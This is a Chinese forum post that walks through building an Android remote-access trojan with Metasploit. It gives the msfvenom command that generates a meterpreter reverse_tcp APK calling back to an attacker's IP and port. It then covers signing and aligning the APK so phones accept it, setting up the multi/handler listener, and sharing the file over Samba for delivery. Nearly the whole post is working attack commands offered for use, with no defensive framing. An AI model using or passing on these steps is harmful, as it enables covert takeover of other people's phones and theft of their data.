0
回答
使用Metasploit入侵安卓手机(超详细哦)
利用AWS快速构建适用于生产的无服务器应用程序,免费试用12个月>>>   

本文原创作者:newbie,本文属i春秋原创奖励计划,未经许可禁止转载!

1.环境准备:
Kali2.0(msfVENOM、metasploit)
安卓手机

 

2.利用过程:

使用msfvenom生成apk木马

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.126 LPORT=1234 R > /test/newbie.apk

 

P 攻击payload

LHOST = 接收反弹连接主机

LPORT = 接收反弹连接主机的监听端口

然后是路径生成路径

为木马添加数字签名

使用到的工具:

1.keytools (密钥、证书管理工具)

2.Jarsigner(jar签名、校验工具)

3.Zipalign(APK优化攻击)需安装

首先使用keytools生成创建证书:

 

keytool -genkey -v -keystore apk-trojan-key.keystore -alias newbie -keyalg RSA -keysize 1024 -validity 999

 

-v 显示密钥库中的证书详细信息

-k eystore 指定密钥库的名称

-alias 产生别名

-keyalg 指定密钥的算法(默认为DSA)

-keysize 指定密钥长度

-validity 指定创建的证书有效期多少天(默认90)

 

然后使用jarsigner进行签名:

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore newbie.apk newbie

 

-verbose 签名/验证时输出详细信息

-sigalg  签名算法的名称

-digestalg 摘要算法的名称

-keystore 密钥库位置

进行签名文件+别名


 

使用-verify对文件签名验证

jarsigner -verify -verbose newbie.apk

 

这样就可以把apk发到手机上安装了

不不不,忘了一步

使用Zipalign优化apk,忘掉这一步部分手机会无法安装,比如我的

zipalign -v 4 newbie.apk  newbie1.apk

 

ok,启动metasploit

依次执行

use exploit/multi/handler 加载攻击模块

set payload android/meterpreter/reverse_tcp  选择要使用的Payload

 

show options 查看需要设置的参数

设置主机ip及端口:

exploit执行

手机运行安装好的木马,这时msf建立了一个会话连接

Help一下看我们能做什么

附一张网上淘来的图:

 

3.小彩蛋:

肯定会有人问,我要怎么把kali的apk文件移到我手机上呢?

给大家提供一个简单的方法。共享一个文件夹把文件放到文件夹中

具体操作:

mkdir /test 创建要共享的文件夹

chmod 777 -R /test 修改权限

vi /etc/samba/smb.conf 编辑配置文件在末尾加入下面内容

 

[share]

      path =/a/share

      available = yes

      browsealbe = yes

      public= no

      writable = yes

创建一个用户然后启动就好

/etc/init.d/samba restart

<无标签>
举报
i春秋学院
发帖于9个月前 0回/1K+阅
顶部